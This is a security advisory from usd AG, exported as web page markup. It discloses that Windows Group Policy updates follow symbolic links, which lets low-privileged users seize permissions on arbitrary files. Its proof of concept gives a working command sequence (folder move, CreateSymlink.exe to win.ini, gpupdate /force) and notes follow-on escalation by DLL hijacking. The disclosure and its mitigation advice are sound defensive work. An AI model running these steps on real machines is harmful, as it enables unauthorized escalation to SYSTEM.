[et_pb_section fb_built=\"1\" _builder_version=\"4.16\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.16\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]<\/p>\n
<\/span> The following behavior was reported to Microsoft in February 2021. After finishing their investigations, Microsoft informed us that they do not consider this a security vulnerability in Windows. As we identified a real-world occurrence of this behavior which lead to privilege escalation, we decided to still disclose this advisory to rise awareness about this topic.<\/em><\/p>\n <\/span><\/p>\n Windows Group Policy updates may allow low privileged user accounts to elevate their privileges by abusing symbolic file system links.<\/p>\n<\/div>\n Windows Group Policies<\/em> are used to control and define the working environment of users and computers within Active Directory<\/em>. They provide a great amount of control and allow to centrally manage Windows settings that should be unified within an organization. Among others, Windows Group Policies<\/em> allow to deploy files, folders and access permissions across domain joined computers. This functionality has found to be vulnerable against symbolic link attacks. If a new file or folder is created, or if access permissions are changed on a file within a user controlled part of the file system, a low privileged user account can redirect the operation using symbolic links. The outcome depends on the actual operation and can lead from privileged file write vulnerabilities to more dangerous privilege escalations.<\/p>\n<\/div>\n The fact that Windows Group Policy<\/em> updates follow symbolic links during file operations can be viewed as a feature, but from our point of view it is a dangerous functionality. We encountered multiple setups where symbolic links could be used to elevate permissions from low privileged user accounts to NT AUTHORITY\\SYSTEM<\/em>. The Proof of Concept<\/em>\u00a0below demonstrates one example for such an situation.<\/p>\n <\/p>\n<\/div>\n <\/span><\/p>\n During one of our <\/span>workstation assessments<\/em> we encountered <\/span>Group Policy Rules<\/em> that allowed low privileged user accounts to take control of\u00a0arbitrary files. The following screenshot shows one of the vulnerable <\/span>GPO Rules<\/em>, that was enumerated using the <\/span>gpresult<\/strong>\u00a0utility.<\/span><\/p>\n [\/et_pb_text][et_pb_image src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2021\/07\/01-gpo.png\" title_text=\"01-gpo\" _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][\/et_pb_image][et_pb_text _builder_version=\"4.16\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]<\/p>\n As one can see above, the rule sets write permissions on a log directory that is used by any authenticated user account. It might look harmless, but as the upper directory C:\\internal\\logs<\/strong>\u00a0is also writable by low privileged user accounts, it is possible to perform a symbolic link attack.<\/p>\n In the following listing, we use the symboliclink-testing-tools<\/a> by James Forshaw<\/a> to create a symbolic link with a low privileged user account. The symbolic link connects the previously mentioned log folder with the well known C:\\Windows\\win.ini<\/strong>\u00a0file.<\/p>\n [\/et_pb_text][et_pb_text _builder_version=\"4.16\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" global_colors_info=\"{}\"]C:\\\u203aicacls C:\\internal\\logs Successfully processed 1 files; Failed processing 0 files<\/p>\n C:\\\u203amove C:\\internal\\logs\\general C:\\ProgramData C:\\\u203aC:\\ProgramData\\CreateSymlink.exe C:\\internal\\logs\\general C:\\Windows\\win.ini [\/et_pb_text][et_pb_text _builder_version=\"4.16\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]<\/p>\n After the symbolic link was created, one can enforce a Group Policy update using the <\/span>gpupdate<\/strong> utility. After the Group Policy update has finished, the file permissions on the <\/span>C:\\Windows\\win.ini<\/strong>\u00a0file should have changed.<\/span><\/p>\n [\/et_pb_text][et_pb_text _builder_version=\"4.16\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]C:\\\u203aicacls C:\\Windows\\win.ini Successfully processed 1 files; Failed processing 0 files<\/p>\n C:\\\u203agpupdate \/force Computer Policy update has completed successfully.<\/p>\n C:\\\u203aicacls C:\\Windows\\win.ini Successfully processed 1 files; Failed processing 0 files<\/code><\/pre>\n [\/et_pb_text][et_pb_text _builder_version=\"4.18.0\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<\/p>\n Escalating privileges from here is a rather easy task. An attacker could use the vulnerability to overwrite an arbitrary service executable or to make a system relevant folder writable. From here, the attacker could perform <\/span>DLL Hijacking<\/em>\u00a0attacks to elevate privileges.<\/span> As already mentioned, the fact that Group Policy updates follow symbolic links might be a feature. It might even be the case that it is required by some Windows internals that we aren\u2019t aware of. However, as demonstrated above, it can lead to dangerous situations for organizations and imposes a security risk when system administrators are not fully aware of it. Therefore, our recommendation suggests not to follow symbolic links during Group Policy updates.<\/p>\n For organizations and system administrators, we recommend to carefully review all file system related rules that are currently configured within your Group Policy settings. Each rule that targets user controlled parts of the file system should be examined carefully for its offensive potential. If in doubt, it might be better to disable the rule and to search for an alternative solution.<\/p>\n <\/span><\/p>\n <\/span><\/p>\n <\/span><\/p>\n This security vulnerability was found by Tobias Neitzel of usd AG.<\/p>\n [\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":" usd-2021-0001 | Insecure File Handling during Group Policy Updates Advisory ID: usd-2021-0001Affected Product: Windows 10Affected Version: LatestVulnerability Type: Symlink VulnerabilitySecurity Risk: ConditionalVendor URL: https:\/\/www.microsoft.comVendor Status: Not fixed \/ Disputed The following behavior was reported to Microsoft in February 2021. After finishing their investigations, Microsoft informed us that they do not consider this a security vulnerability […]<\/p>\n","protected":false},"author":96,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-16713","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16713","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/96"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=16713"}],"version-history":[{"count":0,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16713\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=16713"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
Advisory ID<\/strong>: usd-2021-0001<\/span>
Affected Product<\/strong>: Windows 10<\/span>
Affected Version<\/strong>: Latest<\/span>
Vulnerability Type<\/strong>: Symlink Vulnerability<\/span>
Security Risk<\/strong>: Conditional<\/span>
Vendor URL<\/strong>: https:\/\/www.microsoft.com<\/a><\/span>
Vendor Status<\/strong>: Not fixed \/ Disputed<\/span><\/p>\nDescription<\/h3>\n
Proof of Concept (PoC)<\/h3>\n
\nC:\\internal\\logs BUILTIN\\Administrators:(I)(OI)(CI)(F)
\nNT AUTHORITY\\SYSTEM:(I)(OI)(CI)(F)
\nBUILTIN\\Users:(I)(OI)(CI)(RX)
\nNT AUTHORITY\\Authenticated Users:(I)(M)
\nNT AUTHORITY\\Authenticated Users:(I)(OI)(CI)(IO)(M)<\/p>\n
\n1 dir(s) moved.<\/p>\n
\nOpened Link \\RPC Control\\general -\u203a \\??\\C:\\Windows\\win.ini: 00000184
\nPress ENTER to exit and delete the symlink<\/code><\/pre>\n
\nC:\\Windows\\win.ini BUILTIN\\Administrators:(I)(F)
\nNT AUTHORITY\\SYSTEM:(I)(F)
\nBUILTIN\\Users:(I)(RX)
\nAPPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)
\nAPPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)<\/p>\n
\nUpdating policy...<\/p>\n
\nC:\\Windows\\win.ini BUILTIN\\Users:(M)
\nBUILTIN\\Administrators:(I)(F)
\nNT AUTHORITY\\SYSTEM:(I)(F)
\nBUILTIN\\Users:(I)(RX)
\nNT AUTHORITY\\Authenticated Users:(I)(M)<\/p>\n
<\/span>
<\/span><\/p>\nFix<\/h3>\n
References<\/h3>\n
\n
Timeline<\/h3>\n
\n
Credits<\/h3>\n